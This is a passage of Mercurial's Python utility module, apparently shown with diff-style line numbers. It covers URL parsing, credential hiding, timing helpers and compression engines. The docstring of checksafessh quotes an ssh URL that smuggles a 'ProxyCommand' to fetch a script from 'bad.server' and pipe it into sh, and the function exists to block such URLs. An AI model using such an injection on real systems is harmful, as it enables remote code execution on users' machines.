2702 2704
2703 2705 If parsefragment is False, fragment is included in query. If
2704 2706 parsequery is False, query is included in path. If both are
2705 2707 False, both fragment and query are included in path.
2706 2708
2707 2709 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2708 2710
2709 2711 Note that for backward compatibility reasons, bundle URLs do not
2710 2712 take host names. That means 'bundle://../' has a path of '../'.
2711 2713
2712 2714 Examples:
2713 2715
2714 2716 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2715 2717 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2716 2718 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2717 2719 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2718 2720 >>> url(b'file:///home/joe/repo')
2719 2721 <url scheme: 'file', path: '/home/joe/repo'>
2720 2722 >>> url(b'file:///c:/temp/foo/')
2721 2723 <url scheme: 'file', path: 'c:/temp/foo/'>
2722 2724 >>> url(b'bundle:foo')
2723 2725 <url scheme: 'bundle', path: 'foo'>
2724 2726 >>> url(b'bundle://../foo')
2725 2727 <url scheme: 'bundle', path: '../foo'>
2726 2728 >>> url(br'c:\foo\bar')
2727 2729 <url path: 'c:\\foo\\bar'>
2728 2730 >>> url(br'\\blah\blah\blah')
2729 2731 <url path: '\\\\blah\\blah\\blah'>
2730 2732 >>> url(br'\\blah\blah\blah#baz')
2731 2733 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2732 2734 >>> url(br'file:///C:\users\me')
2733 2735 <url scheme: 'file', path: 'C:\\users\\me'>
2734 2736
2735 2737 Authentication credentials:
2736 2738
2737 2739 >>> url(b'ssh://joe:xyz@x/repo')
2738 2740 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2739 2741 >>> url(b'ssh://joe@x/repo')
2740 2742 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2741 2743
2742 2744 Query strings and fragments:
2743 2745
2744 2746 >>> url(b'http://host/a?b#c')
2745 2747 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2746 2748 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2747 2749 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2748 2750
2749 2751 Empty path:
2750 2752
2751 2753 >>> url(b'')
2752 2754 <url path: ''>
2753 2755 >>> url(b'#a')
2754 2756 <url path: '', fragment: 'a'>
2755 2757 >>> url(b'http://host/')
2756 2758 <url scheme: 'http', host: 'host', path: ''>
2757 2759 >>> url(b'http://host/#a')
2758 2760 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2759 2761
2760 2762 Only scheme:
2761 2763
2762 2764 >>> url(b'http:')
2763 2765 <url scheme: 'http'>
2764 2766 """
2765 2767
2766 2768 _safechars = "!~*'()+"
2767 2769 _safepchars = "/!~*'()+:\\"
2768 2770 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2769 2771
2770 2772 def __init__(self, path, parsequery=True, parsefragment=True):
2771 2773 # We slowly chomp away at path until we have only the path left
2772 2774 self.scheme = self.user = self.passwd = self.host = None
2773 2775 self.port = self.path = self.query = self.fragment = None
2774 2776 self._localpath = True
2775 2777 self._hostport = ''
2776 2778 self._origpath = path
2777 2779
2778 2780 if parsefragment and '#' in path:
2779 2781 path, self.fragment = path.split('#', 1)
2780 2782
2781 2783 # special case for Windows drive letters and UNC paths
2782 2784 if hasdriveletter(path) or path.startswith('\\\\'):
2783 2785 self.path = path
2784 2786 return
2785 2787
2786 2788 # For compatibility reasons, we can't handle bundle paths as
2787 2789 # normal URLS
2788 2790 if path.startswith('bundle:'):
2789 2791 self.scheme = 'bundle'
2790 2792 path = path[7:]
2791 2793 if path.startswith('//'):
2792 2794 path = path[2:]
2793 2795 self.path = path
2794 2796 return
2795 2797
2796 2798 if self._matchscheme(path):
2797 2799 parts = path.split(':', 1)
2798 2800 if parts[0]:
2799 2801 self.scheme, path = parts
2800 2802 self._localpath = False
2801 2803
2802 2804 if not path:
2803 2805 path = None
2804 2806 if self._localpath:
2805 2807 self.path = ''
2806 2808 return
2807 2809 else:
2808 2810 if self._localpath:
2809 2811 self.path = path
2810 2812 return
2811 2813
2812 2814 if parsequery and '?' in path:
2813 2815 path, self.query = path.split('?', 1)
2814 2816 if not path:
2815 2817 path = None
2816 2818 if not self.query:
2817 2819 self.query = None
2818 2820
2819 2821 # // is required to specify a host/authority
2820 2822 if path and path.startswith('//'):
2821 2823 parts = path[2:].split('/', 1)
2822 2824 if len(parts) > 1:
2823 2825 self.host, path = parts
2824 2826 else:
2825 2827 self.host = parts[0]
2826 2828 path = None
2827 2829 if not self.host:
2828 2830 self.host = None
2829 2831 # path of file:///d is /d
2830 2832 # path of file:///d:/ is d:/, not /d:/
2831 2833 if path and not hasdriveletter(path):
2832 2834 path = '/' + path
2833 2835
2834 2836 if self.host and '@' in self.host:
2835 2837 self.user, self.host = self.host.rsplit('@', 1)
2836 2838 if ':' in self.user:
2837 2839 self.user, self.passwd = self.user.split(':', 1)
2838 2840 if not self.host:
2839 2841 self.host = None
2840 2842
2841 2843 # Don't split on colons in IPv6 addresses without ports
2842 2844 if (self.host and ':' in self.host and
2843 2845 not (self.host.startswith('[') and self.host.endswith(']'))):
2844 2846 self._hostport = self.host
2845 2847 self.host, self.port = self.host.rsplit(':', 1)
2846 2848 if not self.host:
2847 2849 self.host = None
2848 2850
2849 2851 if (self.host and self.scheme == 'file' and
2850 2852 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2851 2853 raise Abort(_('file:// URLs can only refer to localhost'))
2852 2854
2853 2855 self.path = path
2854 2856
2855 2857 # leave the query string escaped
2856 2858 for a in ('user', 'passwd', 'host', 'port',
2857 2859 'path', 'fragment'):
2858 2860 v = getattr(self, a)
2859 2861 if v is not None:
2860 2862 setattr(self, a, urlreq.unquote(v))
2861 2863
2862 2864 @encoding.strmethod
2863 2865 def __repr__(self):
2864 2866 attrs = []
2865 2867 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2866 2868 'query', 'fragment'):
2867 2869 v = getattr(self, a)
2868 2870 if v is not None:
2869 2871 attrs.append('%s: %r' % (a, v))
2870 2872 return '<url %s>' % ', '.join(attrs)
2871 2873
2872 2874 def __bytes__(self):
2873 2875 r"""Join the URL's components back into a URL string.
2874 2876
2875 2877 Examples:
2876 2878
2877 2879 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2878 2880 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2879 2881 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2880 2882 'http://user:pw@host:80/?foo=bar&baz=42'
2881 2883 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2882 2884 'http://user:pw@host:80/?foo=bar%3dbaz'
2883 2885 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2884 2886 'ssh://user:pw@[::1]:2200//home/joe#'
2885 2887 >>> bytes(url(b'http://localhost:80//'))
2886 2888 'http://localhost:80//'
2887 2889 >>> bytes(url(b'http://localhost:80/'))
2888 2890 'http://localhost:80/'
2889 2891 >>> bytes(url(b'http://localhost:80'))
2890 2892 'http://localhost:80/'
2891 2893 >>> bytes(url(b'bundle:foo'))
2892 2894 'bundle:foo'
2893 2895 >>> bytes(url(b'bundle://../foo'))
2894 2896 'bundle:../foo'
2895 2897 >>> bytes(url(b'path'))
2896 2898 'path'
2897 2899 >>> bytes(url(b'file:///tmp/foo/bar'))
2898 2900 'file:///tmp/foo/bar'
2899 2901 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2900 2902 'file:///c:/tmp/foo/bar'
2901 2903 >>> print(url(br'bundle:foo\bar'))
2902 2904 bundle:foo\bar
2903 2905 >>> print(url(br'file:///D:\data\hg'))
2904 2906 file:///D:\data\hg
2905 2907 """
2906 2908 if self._localpath:
2907 2909 s = self.path
2908 2910 if self.scheme == 'bundle':
2909 2911 s = 'bundle:' + s
2910 2912 if self.fragment:
2911 2913 s += '#' + self.fragment
2912 2914 return s
2913 2915
2914 2916 s = self.scheme + ':'
2915 2917 if self.user or self.passwd or self.host:
2916 2918 s += '//'
2917 2919 elif self.scheme and (not self.path or self.path.startswith('/')
2918 2920 or hasdriveletter(self.path)):
2919 2921 s += '//'
2920 2922 if hasdriveletter(self.path):
2921 2923 s += '/'
2922 2924 if self.user:
2923 2925 s += urlreq.quote(self.user, safe=self._safechars)
2924 2926 if self.passwd:
2925 2927 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2926 2928 if self.user or self.passwd:
2927 2929 s += '@'
2928 2930 if self.host:
2929 2931 if not (self.host.startswith('[') and self.host.endswith(']')):
2930 2932 s += urlreq.quote(self.host)
2931 2933 else:
2932 2934 s += self.host
2933 2935 if self.port:
2934 2936 s += ':' + urlreq.quote(self.port)
2935 2937 if self.host:
2936 2938 s += '/'
2937 2939 if self.path:
2938 2940 # TODO: similar to the query string, we should not unescape the
2939 2941 # path when we store it, the path might contain '%2f' = '/',
2940 2942 # which we should *not* escape.
2941 2943 s += urlreq.quote(self.path, safe=self._safepchars)
2942 2944 if self.query:
2943 2945 # we store the query in escaped form.
2944 2946 s += '?' + self.query
2945 2947 if self.fragment is not None:
2946 2948 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2947 2949 return s
2948 2950
2949 2951 __str__ = encoding.strmethod(__bytes__)
2950 2952
2951 2953 def authinfo(self):
2952 2954 user, passwd = self.user, self.passwd
2953 2955 try:
2954 2956 self.user, self.passwd = None, None
2955 2957 s = bytes(self)
2956 2958 finally:
2957 2959 self.user, self.passwd = user, passwd
2958 2960 if not self.user:
2959 2961 return (s, None)
2960 2962 # authinfo[1] is passed to urllib2 password manager, and its
2961 2963 # URIs must not contain credentials. The host is passed in the
2962 2964 # URIs list because Python < 2.4.3 uses only that to search for
2963 2965 # a password.
2964 2966 return (s, (None, (s, self.host),
2965 2967 self.user, self.passwd or ''))
2966 2968
2967 2969 def isabs(self):
2968 2970 if self.scheme and self.scheme != 'file':
2969 2971 return True # remote URL
2970 2972 if hasdriveletter(self.path):
2971 2973 return True # absolute for our purposes - can't be joined()
2972 2974 if self.path.startswith(br'\\'):
2973 2975 return True # Windows UNC path
2974 2976 if self.path.startswith('/'):
2975 2977 return True # POSIX-style
2976 2978 return False
2977 2979
2978 2980 def localpath(self):
2979 2981 if self.scheme == 'file' or self.scheme == 'bundle':
2980 2982 path = self.path or '/'
2981 2983 # For Windows, we need to promote hosts containing drive
2982 2984 # letters to paths with drive letters.
2983 2985 if hasdriveletter(self._hostport):
2984 2986 path = self._hostport + '/' + self.path
2985 2987 elif (self.host is not None and self.path
2986 2988 and not hasdriveletter(path)):
2987 2989 path = '/' + path
2988 2990 return path
2989 2991 return self._origpath
2990 2992
2991 2993 def islocal(self):
2992 2994 '''whether localpath will return something that posixfile can open'''
2993 2995 return (not self.scheme or self.scheme == 'file'
2994 2996 or self.scheme == 'bundle')
2995 2997
2996 2998 def hasscheme(path):
2997 2999 return bool(url(path).scheme)
2998 3000
2999 3001 def hasdriveletter(path):
3000 3002 return path and path[1:2] == ':' and path[0:1].isalpha()
3001 3003
3002 3004 def urllocalpath(path):
3003 3005 return url(path, parsequery=False, parsefragment=False).localpath()
3004 3006
3005 3007 def checksafessh(path):
3006 3008 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3007 3009
3008 3010 This is a sanity check for ssh urls. ssh will parse the first item as
3009 3011 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3010 3012 Let's prevent these potentially exploited urls entirely and warn the
3011 3013 user.
3012 3014
3013 3015 Raises an error.Abort when the url is unsafe.
3014 3016 """
3015 3017 path = urlreq.unquote(path)
3016 3018 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3017 3019 raise error.Abort(_('potentially unsafe url: %r') %
3018 3020 (path,))
3019 3021
3020 3022 def hidepassword(u):
3021 3023 '''hide user credential in a url string'''
3022 3024 u = url(u)
3023 3025 if u.passwd:
3024 3026 u.passwd = '***'
3025 3027 return bytes(u)
3026 3028
3027 3029 def removeauth(u):
3028 3030 '''remove all authentication information from a url string'''
3029 3031 u = url(u)
3030 3032 u.user = u.passwd = None
3031 3033 return str(u)
3032 3034
3033 3035 timecount = unitcountfn(
3034 3036 (1, 1e3, _('%.0f s')),
3035 3037 (100, 1, _('%.1f s')),
3036 3038 (10, 1, _('%.2f s')),
3037 3039 (1, 1, _('%.3f s')),
3038 3040 (100, 0.001, _('%.1f ms')),
3039 3041 (10, 0.001, _('%.2f ms')),
3040 3042 (1, 0.001, _('%.3f ms')),
3041 3043 (100, 0.000001, _('%.1f us')),
3042 3044 (10, 0.000001, _('%.2f us')),
3043 3045 (1, 0.000001, _('%.3f us')),
3044 3046 (100, 0.000000001, _('%.1f ns')),
3045 3047 (10, 0.000000001, _('%.2f ns')),
3046 3048 (1, 0.000000001, _('%.3f ns')),
3047 3049 )
3048 3050
3049 3051 _timenesting = [0]
3050 3052
3051 3053 def timed(func):
3052 3054 '''Report the execution time of a function call to stderr.
3053 3055
3054 3056 During development, use as a decorator when you need to measure
3055 3057 the cost of a function, e.g. as follows:
3056 3058
3057 3059 @util.timed
3058 3060 def foo(a, b, c):
3059 3061 pass
3060 3062 '''
3061 3063
3062 3064 def wrapper(*args, **kwargs):
3063 3065 start = timer()
3064 3066 indent = 2
3065 3067 _timenesting[0] += indent
3066 3068 try:
3067 3069 return func(*args, **kwargs)
3068 3070 finally:
3069 3071 elapsed = timer() - start
3070 3072 _timenesting[0] -= indent
3071 3073 stderr.write('%s%s: %s\n' %
3072 3074 (' ' * _timenesting[0], func.__name__,
3073 3075 timecount(elapsed)))
3074 3076 return wrapper
3075 3077
3076 3078 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3077 3079 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3078 3080
3079 3081 def sizetoint(s):
3080 3082 '''Convert a space specifier to a byte count.
3081 3083
3082 3084 >>> sizetoint(b'30')
3083 3085 30
3084 3086 >>> sizetoint(b'2.2kb')
3085 3087 2252
3086 3088 >>> sizetoint(b'6M')
3087 3089 6291456
3088 3090 '''
3089 3091 t = s.strip().lower()
3090 3092 try:
3091 3093 for k, u in _sizeunits:
3092 3094 if t.endswith(k):
3093 3095 return int(float(t[:-len(k)]) * u)
3094 3096 return int(t)
3095 3097 except ValueError:
3096 3098 raise error.ParseError(_("couldn't parse size: %s") % s)
3097 3099
3098 3100 class hooks(object):
3099 3101 '''A collection of hook functions that can be used to extend a
3100 3102 function's behavior. Hooks are called in lexicographic order,
3101 3103 based on the names of their sources.'''
3102 3104
3103 3105 def __init__(self):
3104 3106 self._hooks = []
3105 3107
3106 3108 def add(self, source, hook):
3107 3109 self._hooks.append((source, hook))
3108 3110
3109 3111 def __call__(self, *args):
3110 3112 self._hooks.sort(key=lambda x: x[0])
3111 3113 results = []
3112 3114 for source, hook in self._hooks:
3113 3115 results.append(hook(*args))
3114 3116 return results
3115 3117
3116 3118 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3117 3119 '''Yields lines for a nicely formatted stacktrace.
3118 3120 Skips the 'skip' last entries, then return the last 'depth' entries.
3119 3121 Each file+linenumber is formatted according to fileline.
3120 3122 Each line is formatted according to line.
3121 3123 If line is None, it yields:
3122 3124 length of longest filepath+line number,
3123 3125 filepath+linenumber,
3124 3126 function
3125 3127
3126 3128 Not be used in production code but very convenient while developing.
3127 3129 '''
3128 3130 entries = [(fileline % (fn, ln), func)
3129 3131 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3130 3132 ][-depth:]
3131 3133 if entries:
3132 3134 fnmax = max(len(entry[0]) for entry in entries)
3133 3135 for fnln, func in entries:
3134 3136 if line is None:
3135 3137 yield (fnmax, fnln, func)
3136 3138 else:
3137 3139 yield line % (fnmax, fnln, func)
3138 3140
3139 3141 def debugstacktrace(msg='stacktrace', skip=0,
3140 3142 f=stderr, otherf=stdout, depth=0):
3141 3143 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3142 3144 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3143 3145 By default it will flush stdout first.
3144 3146 It can be used everywhere and intentionally does not require an ui object.
3145 3147 Not be used in production code but very convenient while developing.
3146 3148 '''
3147 3149 if otherf:
3148 3150 otherf.flush()
3149 3151 f.write('%s at:\n' % msg.rstrip())
3150 3152 for line in getstackframes(skip + 1, depth=depth):
3151 3153 f.write(line)
3152 3154 f.flush()
3153 3155
3154 3156 class dirs(object):
3155 3157 '''a multiset of directory names from a dirstate or manifest'''
3156 3158
3157 3159 def __init__(self, map, skip=None):
3158 3160 self._dirs = {}
3159 3161 addpath = self.addpath
3160 3162 if safehasattr(map, 'iteritems') and skip is not None:
3161 3163 for f, s in map.iteritems():
3162 3164 if s[0] != skip:
3163 3165 addpath(f)
3164 3166 else:
3165 3167 for f in map:
3166 3168 addpath(f)
3167 3169
3168 3170 def addpath(self, path):
3169 3171 dirs = self._dirs
3170 3172 for base in finddirs(path):
3171 3173 if base in dirs:
3172 3174 dirs[base] += 1
3173 3175 return
3174 3176 dirs[base] = 1
3175 3177
3176 3178 def delpath(self, path):
3177 3179 dirs = self._dirs
3178 3180 for base in finddirs(path):
3179 3181 if dirs[base] > 1:
3180 3182 dirs[base] -= 1
3181 3183 return
3182 3184 del dirs[base]
3183 3185
3184 3186 def __iter__(self):
3185 3187 return iter(self._dirs)
3186 3188
3187 3189 def __contains__(self, d):
3188 3190 return d in self._dirs
3189 3191
3190 3192 if safehasattr(parsers, 'dirs'):
3191 3193 dirs = parsers.dirs
3192 3194
3193 3195 def finddirs(path):
3194 3196 pos = path.rfind('/')
3195 3197 while pos != -1:
3196 3198 yield path[:pos]
3197 3199 pos = path.rfind('/', 0, pos)
3198 3200
3199 3201 # compression code
3200 3202
3201 3203 SERVERROLE = 'server'
3202 3204 CLIENTROLE = 'client'
3203 3205
3204 3206 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3205 3207 (u'name', u'serverpriority',
3206 3208 u'clientpriority'))
3207 3209
3208 3210 class compressormanager(object):
3209 3211 """Holds registrations of various compression engines.
3210 3212
3211 3213 This class essentially abstracts the differences between compression
3212 3214 engines to allow new compression formats to be added easily, possibly from
3213 3215 extensions.
3214 3216
3215 3217 Compressors are registered against the global instance by calling its
3216 3218 ``register()`` method.
3217 3219 """
3218 3220 def __init__(self):
3219 3221 self._engines = {}
3220 3222 # Bundle spec human name to engine name.
3221 3223 self._bundlenames = {}
3222 3224 # Internal bundle identifier to engine name.
3223 3225 self._bundletypes = {}
3224 3226 # Revlog header to engine name.
3225 3227 self._revlogheaders = {}
3226 3228 # Wire proto identifier to engine name.
3227 3229 self._wiretypes = {}
3228 3230
3229 3231 def __getitem__(self, key):
3230 3232 return self._engines[key]
3231 3233
3232 3234 def __contains__(self, key):
3233 3235 return key in self._engines
3234 3236
3235 3237 def __iter__(self):
3236 3238 return iter(self._engines.keys())
3237 3239
3238 3240 def register(self, engine):
3239 3241 """Register a compression engine with the manager.
3240 3242
3241 3243 The argument must be a ``compressionengine`` instance.
3242 3244 """
3243 3245 if not isinstance(engine, compressionengine):
3244 3246 raise ValueError(_('argument must be a compressionengine'))
3245 3247
3246 3248 name = engine.name()
3247 3249
3248 3250 if name in self._engines:
3249 3251 raise error.Abort(_('compression engine %s already registered') %
3250 3252 name)
3251 3253
3252 3254 bundleinfo = engine.bundletype()
3253 3255 if bundleinfo:
3254 3256 bundlename, bundletype = bundleinfo
3255 3257
3256 3258 if bundlename in self._bundlenames:
3257 3259 raise error.Abort(_('bundle name %s already registered') %
3258 3260 bundlename)
3259 3261 if bundletype in self._bundletypes:
3260 3262 raise error.Abort(_('bundle type %s already registered by %s') %
3261 3263 (bundletype, self._bundletypes[bundletype]))
3262 3264
3263 3265 # No external facing name declared.
3264 3266 if bundlename:
3265 3267 self._bundlenames[bundlename] = name
3266 3268
3267 3269 self._bundletypes[bundletype] = name
3268 3270
3269 3271 wiresupport = engine.wireprotosupport()
3270 3272 if wiresupport:
3271 3273 wiretype = wiresupport.name
3272 3274 if wiretype in self._wiretypes:
3273 3275 raise error.Abort(_('wire protocol compression %s already '
3274 3276 'registered by %s') %
3275 3277 (wiretype, self._wiretypes[wiretype]))
3276 3278
3277 3279 self._wiretypes[wiretype] = name
3278 3280
3279 3281 revlogheader = engine.revlogheader()
3280 3282 if revlogheader and revlogheader in self._revlogheaders:
3281 3283 raise error.Abort(_('revlog header %s already registered by %s') %
3282 3284 (revlogheader, self._revlogheaders[revlogheader]))
3283 3285
3284 3286 if revlogheader:
3285 3287 self._revlogheaders[revlogheader] = name
3286 3288
3287 3289 self._engines[name] = engine
3288 3290
3289 3291 @property
3290 3292 def supportedbundlenames(self):
3291 3293 return set(self._bundlenames.keys())
3292 3294
3293 3295 @property
3294 3296 def supportedbundletypes(self):
3295 3297 return set(self._bundletypes.keys())
3296 3298
3297 3299 def forbundlename(self, bundlename):
3298 3300 """Obtain a compression engine registered to a bundle name.
3299 3301
3300 3302 Will raise KeyError if the bundle type isn't registered.
3301 3303
3302 3304 Will abort if the engine is known but not available.
3303 3305 """
3304 3306 engine = self._engines[self._bundlenames[bundlename]]
3305 3307 if not engine.available():
3306 3308 raise error.Abort(_('compression engine %s could not be loaded') %
3307 3309 engine.name())
3308 3310 return engine
3309 3311
3310 3312 def forbundletype(self, bundletype):
3311 3313 """Obtain a compression engine registered to a bundle type.
3312 3314
3313 3315 Will raise KeyError if the bundle type isn't registered.
3314 3316
3315 3317 Will abort if the engine is known but not available.
3316 3318 """
3317 3319 engine = self._engines[self._bundletypes[bundletype]]
3318 3320 if not engine.available():
3319 3321 raise error.Abort(_('compression engine %s could not be loaded') %
3320 3322 engine.name())
3321 3323 return engine
3322 3324
3323 3325 def supportedwireengines(self, role, onlyavailable=True):
3324 3326 """Obtain compression engines that support the wire protocol.
3325 3327
3326 3328 Returns a list of engines in prioritized order, most desired first.
3327 3329
3328 3330 If ``onlyavailable`` is set, filter out engines that can't be
3329 3331 loaded.
3330 3332 """
3331 3333 assert role in (SERVERROLE, CLIENTROLE)
3332 3334
3333 3335 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3334 3336
3335 3337 engines = [self._engines[e] for e in self._wiretypes.values()]
3336 3338 if onlyavailable:
3337 3339 engines = [e for e in engines if e.available()]
3338 3340
3339 3341 def getkey(e):
3340 3342 # Sort first by priority, highest first. In case of tie, sort
3341 3343 # alphabetically. This is arbitrary, but ensures output is
3342 3344 # stable.
3343 3345 w = e.wireprotosupport()
3344 3346 return -1 * getattr(w, attr), w.name
3345 3347
3346 3348 return list(sorted(engines, key=getkey))
3347 3349
3348 3350 def forwiretype(self, wiretype):
3349 3351 engine = self._engines[self._wiretypes[wiretype]]
3350 3352 if not engine.available():
3351 3353 raise error.Abort(_('compression engine %s could not be loaded') %
3352 3354 engine.name())
3353 3355 return engine
3354 3356
3355 3357 def forrevlogheader(self, header):
3356 3358 """Obtain a compression engine registered to a revlog header.
3357 3359
3358 3360 Will raise KeyError if the revlog header value isn't registered.
3359 3361 """
3360 3362 return self._engines[self._revlogheaders[header]]
3361 3363
3362 3364 compengines = compressormanager()
3363 3365
3364 3366 class compressionengine(object):
3365 3367 """Base class for compression engines.
3366 3368
3367 3369 Compression engines must implement the interface defined by this class.
3368 3370 """
3369 3371 def name(self):
3370 3372 """Returns the name of the compression engine.
3371 3373
3372 3374 This is the key the engine is registered under.
3373 3375
3374 3376 This method must be implemented.
3375 3377 """
3376 3378 raise NotImplementedError()
3377 3379
3378 3380 def available(self):
3379 3381 """Whether the compression engine is available.
3380 3382
3381 3383 The intent of this method is to allow optional compression engines
3382 3384 that may not be available in all installations (such as engines relying
3383 3385 on C extensions that may not be present).
3384 3386 """
3385 3387 return True
3386 3388
3387 3389 def bundletype(self):
3388 3390 """Describes bundle identifiers for this engine.
3389 3391
3390 3392 If this compression engine isn't supported for bundles, returns None.
3391 3393
3392 3394 If this engine can be used for bundles, returns a 2-tuple of strings of
3393 3395 the user-facing "bundle spec" compression name and an internal
3394 3396 identifier used to denote the compression format within bundles. To
3395 3397 exclude the name from external usage, set the first element to ``None``.
3396 3398
3397 3399 If bundle compression is supported, the class must also implement
3398 3400 ``compressstream`` and `decompressorreader``.
3399 3401
3400 3402 The docstring of this method is used in the help system to tell users
3401 3403 about this engine.
3402 3404 """
3403 3405 return None
3404 3406
3405 3407 def wireprotosupport(self):
3406 3408 """Declare support for this compression format on the wire protocol.
3407 3409
3408 3410 If this compression engine isn't supported for compressing wire
3409 3411 protocol payloads, returns None.
3410 3412
3411 3413 Otherwise, returns ``compenginewireprotosupport`` with the following
3412 3414 fields:
3413 3415
3414 3416 * String format identifier
3415 3417 * Integer priority for the server
3416 3418 * Integer priority for the client
3417 3419
3418 3420 The integer priorities are used to order the advertisement of format
3419 3421 support by server and client. The highest integer is advertised
3420 3422 first. Integers with non-positive values aren't advertised.
3421 3423
3422 3424 The priority values are somewhat arbitrary and only used for default
3423 3425 ordering. The relative order can be changed via config options.
3424 3426
3425 3427 If wire protocol compression is supported, the class must also implement
3426 3428 ``compressstream`` and ``decompressorreader``.
3427 3429 """
3428 3430 return None
3429 3431
3430 3432 def revlogheader(self):
3431 3433 """Header added to revlog chunks that identifies this engine.
3432 3434
3433 3435 If this engine can be used to compress revlogs, this method should
3434 3436 return the bytes used to identify chunks compressed with this engine.
3435 3437 Else, the method should return ``None`` to indicate it does not
3436 3438 participate in revlog compression.
3437 3439 """
3438 3440 return None
3439 3441
3440 3442 def compressstream(self, it, opts=None):
3441 3443 """Compress an iterator of chunks.
3442 3444
3443 3445 The method receives an iterator (ideally a generator) of chunks of
3444 3446 bytes to be compressed. It returns an iterator (ideally a generator)
3445 3447 of bytes of chunks representing the compressed output.
3446 3448
3447 3449 Optionally accepts an argument defining how to perform compression.
3448 3450 Each engine treats this argument differently.
3449 3451 """
3450 3452 raise NotImplementedError()
3451 3453
3452 3454 def decompressorreader(self, fh):
3453 3455 """Perform decompression on a file object.
3454 3456
3455 3457 Argument is an object with a ``read(size)`` method that returns
3456 3458 compressed data. Return value is an object with a ``read(size)`` that
3457 3459 returns uncompressed data.
3458 3460 """
3459 3461 raise NotImplementedError()
3460 3462
3461 3463 def revlogcompressor(self, opts=None):
3462 3464 """Obtain an object that can be used to compress revlog entries.
3463 3465
3464 3466 The object has a ``compress(data)`` method that compresses binary
3465 3467 data. This method returns compressed binary data or ``None`` if
3466 3468 the data could not be compressed (too small, not compressible, etc).
3467 3469 The returned data should have a header uniquely identifying this
3468 3470 compression format so decompression can be routed to this engine.
3469 3471 This header should be identified by the ``revlogheader()`` return
3470 3472 value.
3471 3473
3472 3474 The object has a ``decompress(data)`` method that decompresses
3473 3475 data. The method will only be called if ``data`` begins with
3474 3476 ``revlogheader()``. The method should return the raw, uncompressed
3475 3477 data or raise a ``RevlogError``.
3476 3478
3477 3479 The object is reusable but is not thread safe.
3478 3480 """
3479 3481 raise NotImplementedError()
3480 3482
3481 3483 class _zlibengine(compressionengine):
3482 3484 def name(self):
3483 3485 return 'zlib'
3484 3486
3485 3487 def bundletype(self):
3486 3488 """zlib compression using the DEFLATE algorithm.
3487 3489
3488 3490 All Mercurial clients should support this format. The compression
3489 3491 algorithm strikes a reasonable balance between compression ratio
3490 3492 and size.
3491 3493 """
3492 3494 return 'gzip', 'GZ'
3493 3495
3494 3496 def wireprotosupport(self):
3495 3497 return compewireprotosupport('zlib', 20, 20)
3496 3498
3497 3499 def revlogheader(self):
3498 3500 return 'x'
3499 3501
3500 3502 def compressstream(self, it, opts=None):
3501 3503 opts = opts or {}
3502 3504
3503 3505 z = zlib.compressobj(opts.get('level', -1))
3504 3506 for chunk in it:
3505 3507 data = z.compress(chunk)
3506 3508 # Not all calls to compress emit data. It is cheaper to inspect
3507 3509 # here than to feed empty chunks through generator.
3508 3510 if data:
3509 3511 yield data
3510 3512
3511 3513 yield z.flush()
3512 3514
3513 3515 def decompressorreader(self, fh):
3514 3516 def gen():
3515 3517 d = zlib.decompressobj()
3516 3518 for chunk in filechunkiter(fh):
3517 3519 while chunk:
3518 3520 # Limit output size to limit memory.
3519 3521 yield d.decompress(chunk, 2 ** 18)
3520 3522 chunk = d.unconsumed_tail
3521 3523
3522 3524 return chunkbuffer(gen())
3523 3525
3524 3526 class zlibrevlogcompressor(object):
3525 3527 def compress(self, data):
3526 3528 insize = len(data)
3527 3529 # Caller handles empty input case.
3528 3530 assert insize > 0
3529 3531
3530 3532 if insize < 44:
3531 3533 return None
3532 3534
3533 3535 elif insize <= 1000000:
3534 3536 compressed = zlib.compress(data)
3535 3537 if len(compressed) < insize:
3536 3538 return compressed
3537 3539 return None
3538 3540
3539 3541 # zlib makes an internal copy of the input buffer, doubling
3540 3542 # memory usage for large inputs. So do streaming compression
3541 3543 # on large inputs.
3542 3544 else:
3543 3545 z = zlib.compressobj()
3544 3546 parts = []
3545 3547 pos = 0
3546 3548 while pos < insize:
3547 3549 pos2 = pos + 2**20
3548 3550 parts.append(z.compress(data[pos:pos2]))
3549 3551 pos = pos2
3550 3552 parts.append(z.flush())
3551 3553
3552 3554 if sum(map(len, parts)) < insize:
3553 3555 return ''.join(parts)
3554 3556 return None
3555 3557
3556 3558 def decompress(self, data):
3557 3559 try:
3558 3560 return zlib.decompress(data)
3559 3561 except zlib.error as e:
3560 3562 raise error.RevlogError(_('revlog decompress error: %s') %
3561 3563 str(e))
3562 3564
3563 3565 def revlogcompressor(self, opts=None):
3564 3566 return self.zlibrevlogcompressor()
3565 3567
